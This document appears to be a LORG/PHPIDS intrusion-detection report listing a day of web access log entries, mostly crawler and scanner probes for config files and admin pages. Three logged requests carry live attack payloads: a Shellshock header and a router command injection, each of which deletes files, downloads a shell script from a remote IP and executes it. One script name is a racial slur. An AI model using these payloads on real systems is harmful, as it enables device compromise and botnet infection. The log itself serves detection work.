LORG Detection Results [lorg]

Summary: one incident discovered from one client

192.168.21.127 | 1 incident | impact ∑: 17

attacks only

Description: A targeted scan and human attacker yesterday. A total of one incident was discovered by phpids detection modules.

Impact	Tags	Remote-City	Remote-Host	Remote-Logname	Remote-User	Date	Request	Final-Status	Bytes-Sent	Referer	User-Agent
0	none	-	192.168.21.127	-	-	Wed, 24 Jan 2024 00:14:03 +0100	GET / HTTP/1.1	200	10349	-	Mozilla/5.0 zgrab/0.x
0	none	-	192.168.21.127	-	-	Wed, 24 Jan 2024 00:21:39 +0100	GET /admin/config.php HTTP/1.0	404	449	-	xfa1
0	none	-	192.168.21.127	-	-	Wed, 24 Jan 2024 00:35:20 +0100	GET /api/.env HTTP/1.1	404	456	-	Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0
0	none	-	192.168.21.127	-	-	Wed, 24 Jan 2024 00:46:10 +0100	GET /admin/config.php HTTP/1.0	404	456	-	xfa1
0	none	-	192.168.21.127	-	-	Wed, 24 Jan 2024 01:34:49 +0100	GET /actuator/gateway/routes HTTP/1.1	404	457	-	Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
0	none	-	192.168.21.127	-	-	Wed, 24 Jan 2024 02:45:46 +0100	GET /robots.txt HTTP/1.1	404	456	-	Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)
0	none	-	192.168.21.127	-	-	Wed, 24 Jan 2024 03:15:17 +0100	GET / HTTP/1.1	200	10349	-	Mozilla/5.0 zgrab/0.x
0	none	-	192.168.21.127	-	-	Wed, 24 Jan 2024 03:22:04 +0100	GET / HTTP/1.1	200	10349	-	Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46
0	none	-	192.168.21.127	-	-	Wed, 24 Jan 2024 03:27:48 +0100	GET /robots.txt HTTP/1.1	404	456	-	Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)
0	none	-	192.168.21.127	-	-	Wed, 24 Jan 2024 03:37:33 +0100	GET /favicon.ico HTTP/1.1	404	456	-	'Cloud mapping experiment. Contact research@pdrlabs.net'
0	none	-	192.168.21.127	-	-	Wed, 24 Jan 2024 03:40:45 +0100	GET /manage/account/login HTTP/1.1	404	456	-	'Cloud mapping experiment. Contact research@pdrlabs.net'
0	none	-	192.168.21.127	-	-	Wed, 24 Jan 2024 03:49:21 +0100	GET /index.html HTTP/1.1	404	456	-	'Cloud mapping experiment. Contact research@pdrlabs.net'
0	none	-	192.168.21.127	-	-	Wed, 24 Jan 2024 03:57:04 +0100	GET / HTTP/1.0	200	230220	-	Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com
0	none	-	192.168.21.127	-	-	Wed, 24 Jan 2024 04:03:09 +0100	GET /logon.htm HTTP/1.1	404	456	-	'Cloud mapping experiment. Contact research@pdrlabs.net'
0	none	-	192.168.21.127	-	-	Wed, 24 Jan 2024 04:12:45 +0100	GET / HTTP/1.1	200	10349	-	'Cloud mapping experiment. Contact research@pdrlabs.net'
0	none	-	192.168.21.127	-	-	Wed, 24 Jan 2024 04:32:50 +0100	GET /2022_11_29_report_access.log.1.html HTTP/1.1	304	146	-	Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.6099.224 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)
0	none	-	192.168.21.127	-	-	Wed, 24 Jan 2024 04:48:09 +0100	GET /cf_scripts/scripts/ajax/ckeditor/ckeditor.js HTTP/1.1	404	456	-	Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
0	none	-	192.168.21.127	-	-	Wed, 24 Jan 2024 05:38:25 +0100	GET /robots.txt HTTP/1.1	404	456	-	Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.134 Safari/537.36
0	none	-	192.168.21.127	-	-	Wed, 24 Jan 2024 05:39:57 +0100	GET /2023_12_19_report_access.log.1.html HTTP/1.1	200	244	-	Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36
0	none	-	192.168.21.127	-	-	Wed, 24 Jan 2024 05:42:22 +0100	GET /favicon.ico HTTP/1.1	404	456	-	Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36
0	none	-	192.168.21.127	-	-	Wed, 24 Jan 2024 05:56:09 +0100	GET / HTTP/1.1	200	230480	-	Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36
0	none	-	192.168.21.127	-	-	Wed, 24 Jan 2024 06:01:33 +0100	GET / HTTP/1.1	200	10349	-	Mozilla/5.0 (compatible; InternetMeasurement/1.0; +https://internet-measurement.com/)
0	none	-	192.168.21.127	-	-	Wed, 24 Jan 2024 06:41:35 +0100	GET /cgi-bin/jarrewrite.sh HTTP/1.1	404	456	-	() { :; }; echo ; /bin/bash -c 'rm -rf *; cd /tmp; wget http://104.168.5.4/nigga.sh; chmod 777 nigga.sh; ./nigga.sh'
0	none	-	192.168.21.127	-	-	Wed, 24 Jan 2024 08:33:03 +0100	GET / HTTP/1.1	200	231228	-	-
0	none	-	192.168.21.127	-	-	Wed, 24 Jan 2024 09:24:31 +0100	GET / HTTP/1.1	200	231228	-	-
0	none	-	192.168.21.127	-	-	Wed, 24 Jan 2024 10:28:28 +0100	GET / HTTP/1.1	400	493	-	-
0	none	-	192.168.21.127	-	-	Wed, 24 Jan 2024 10:56:59 +0100	GET / HTTP/1.1	200	10382	-	python-requests/2.31.0
0	none	-	192.168.21.127	-	-	Wed, 24 Jan 2024 12:15:46 +0100	GET / HTTP/1.1	200	231228	-	-
0	none	-	192.168.21.127	-	-	Wed, 24 Jan 2024 12:51:12 +0100	GET / HTTP/1.1	200	231228	-	Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Edg/120.0.0.0
0	none	-	192.168.21.127	-	-	Wed, 24 Jan 2024 12:51:33 +0100	GET /robots.txt HTTP/1.1	404	456	-	Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_0) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.56 Safari/535.11
0	none	-	192.168.21.127	-	-	Wed, 24 Jan 2024 12:54:49 +0100	GET /aaa9 HTTP/1.1	404	456	-	Mozilla/5.0 zgrab/0.x
0	none	-	192.168.21.127	-	-	Wed, 24 Jan 2024 12:54:54 +0100	GET / HTTP/1.1	200	10382	-	Mozilla/5.0 zgrab/0.x
0	none	-	192.168.21.127	-	-	Wed, 24 Jan 2024 13:09:09 +0100	GET / HTTP/1.1	200	10382	-	Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36
0	none	-	192.168.21.127	-	-	Wed, 24 Jan 2024 13:18:57 +0100	GET / HTTP/1.1	200	10382	-	Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36
0	none	-	192.168.21.127	-	-	Wed, 24 Jan 2024 13:23:36 +0100	GET /.git/config HTTP/1.1	404	456	-	Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/109.0
17	dt id lfi xss csrf rfe	-	192.168.21.127	-	-	Wed, 24 Jan 2024 13:55:35 +0100	GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(cd /tmp; rm -rf *; wget http://104.168.5.4/tenda.sh; chmod 777 tenda.sh;./tenda.sh) HTTP/1.1	404	456	-	Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
0	none	-	192.168.21.127	-	-	Wed, 24 Jan 2024 14:07:31 +0100	GET /cgi-bin/jarrewrite.sh HTTP/1.1	404	456	-	() { :; }; echo ; /bin/bash -c 'rm -rf *; cd /tmp; wget http://104.168.5.4/nigga.sh; chmod 777 nigga.sh; ./nigga.sh'
0	none	-	192.168.21.127	-	-	Wed, 24 Jan 2024 14:08:13 +0100	GET /.env HTTP/1.1	404	462	-	Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6
0	none	-	192.168.21.127	-	-	Wed, 24 Jan 2024 15:01:09 +0100	GET / HTTP/1.1	200	10382	-	Mozilla/5.0 (compatible; InternetMeasurement/1.0; +https://internet-measurement.com/)
0	none	-	192.168.21.127	-	-	Wed, 24 Jan 2024 15:18:04 +0100	GET /2020_08_20_vipex_access.log.1.html HTTP/1.1	304	146	-	Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.6099.224 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)
0	none	-	192.168.21.127	-	-	Wed, 24 Jan 2024 15:24:35 +0100	GET / HTTP/1.1	200	231228	-	-
0	none	-	192.168.21.127	-	-	Wed, 24 Jan 2024 16:16:16 +0100	GET / HTTP/1.1	200	231234	-	Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com
0	none	-	192.168.21.127	-	-	Wed, 24 Jan 2024 16:45:36 +0100	GET / HTTP/1.1	200	231228	-	-
0	none	-	192.168.21.127	-	-	Wed, 24 Jan 2024 17:06:02 +0100	GET /2023_12_13_report_access.log.1.html HTTP/1.1	200	244	-	Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36
0	none	-	192.168.21.127	-	-	Wed, 24 Jan 2024 17:16:34 +0100	GET /.env HTTP/1.1	404	456	-	Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36
0	none	-	192.168.21.127	-	-	Wed, 24 Jan 2024 17:37:28 +0100	GET / HTTP/1.0	200	230963	-	-
0	none	-	192.168.21.127	-	-	Wed, 24 Jan 2024 17:57:45 +0100	GET / HTTP/1.0	200	230968	-	masscan/1.3 (https://github.com/robertdavidgraham/masscan)
0	none	-	192.168.21.127	-	-	Wed, 24 Jan 2024 18:09:15 +0100	GET /wp-head.php HTTP/1.1	503	575	-	Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36
0	none	-	192.168.21.127	-	-	Wed, 24 Jan 2024 18:09:31 +0100	GET /wp-admin/maint/about.php HTTP/1.1	404	462	-	Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36
0	none	-	192.168.21.127	-	-	Wed, 24 Jan 2024 18:09:41 +0100	GET /fm1.php HTTP/1.1	503	575	-	Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36
0	none	-	192.168.21.127	-	-	Wed, 24 Jan 2024 18:09:51 +0100	GET /M1.php HTTP/1.1	503	575	-	Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36
0	none	-	192.168.21.127	-	-	Wed, 24 Jan 2024 18:17:00 +0100	GET /2021_12_06_vipex_access.log.1.html HTTP/1.1	200	244	-	Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.6099.224 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)
0	none	-	192.168.21.127	-	-	Wed, 24 Jan 2024 19:12:40 +0100	GET /autodiscover/autodiscover.json?@zdi/Powershell HTTP/1.1	404	456	-	Mozilla/5.0 zgrab/0.x
0	none	-	192.168.21.127	-	-	Wed, 24 Jan 2024 19:18:19 +0100	GET / HTTP/1.1	200	10382	-	python-requests/2.31.0
0	none	-	192.168.21.127	-	-	Wed, 24 Jan 2024 19:27:37 +0100	GET /wp-content/plugins/index.php HTTP/1.1	404	462	www.google.com	Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36
0	none	-	192.168.21.127	-	-	Wed, 24 Jan 2024 20:19:41 +0100	GET / HTTP/1.1	200	10382	-	Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.0.0 Safari/537.36
0	none	-	192.168.21.127	-	-	Wed, 24 Jan 2024 20:32:28 +0100	GET /2020_08_24_vipex_access.log.1.html HTTP/1.1	304	146	-	Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.6099.224 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)
0	none	-	192.168.21.127	-	-	Wed, 24 Jan 2024 20:35:31 +0100	GET /2020_12_22_vipex_access.log.1.html HTTP/1.1	200	33948	-	Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.6099.224 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)
0	none	-	192.168.21.127	-	-	Wed, 24 Jan 2024 20:42:09 +0100	GET / HTTP/1.1	200	231228	-	-
0	none	-	192.168.21.127	-	-	Wed, 24 Jan 2024 21:17:27 +0100	GET /2019_12_09_vipex_access.log.1.html HTTP/1.1	200	35121	-	Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.6099.224 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)
0	none	-	192.168.21.127	-	-	Wed, 24 Jan 2024 21:43:36 +0100	GET / HTTP/1.1	200	231228	-	-
0	none	-	192.168.21.127	-	-	Wed, 24 Jan 2024 21:45:25 +0100	GET /2022_11_07_report_access.log.1.html HTTP/1.1	304	146	-	Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.6099.224 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)
0	none	-	192.168.21.127	-	-	Wed, 24 Jan 2024 22:14:05 +0100	GET /2022_01_18_vipex_access.log.1.html HTTP/1.1	200	41179	-	Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.6099.224 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)
0	none	-	192.168.21.127	-	-	Wed, 24 Jan 2024 22:24:32 +0100	GET /.DS_Store HTTP/1.1	404	457	-	Go-http-client/2.0
0	none	-	192.168.21.127	-	-	Wed, 24 Jan 2024 22:35:13 +0100	GET / HTTP/1.1	200	231229	-	-
0	none	-	192.168.21.127	-	-	Wed, 24 Jan 2024 22:35:19 +0100	GET /favicon.ico HTTP/1.1	404	456	-	Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)
0	none	-	192.168.21.127	-	-	Wed, 24 Jan 2024 23:20:06 +0100	GET /robots.txt HTTP/1.1	404	462	-	Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)
0	none	-	192.168.21.127	-	-	Wed, 24 Jan 2024 23:44:05 +0100	GET /2020_11_28_vipex_access.log.1.html HTTP/1.1	304	146	-	Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.6099.224 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)
0	none	-	192.168.21.127	-	-	Wed, 24 Jan 2024 23:52:44 +0100	POST / HTTP/1.1	404	456	-	Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36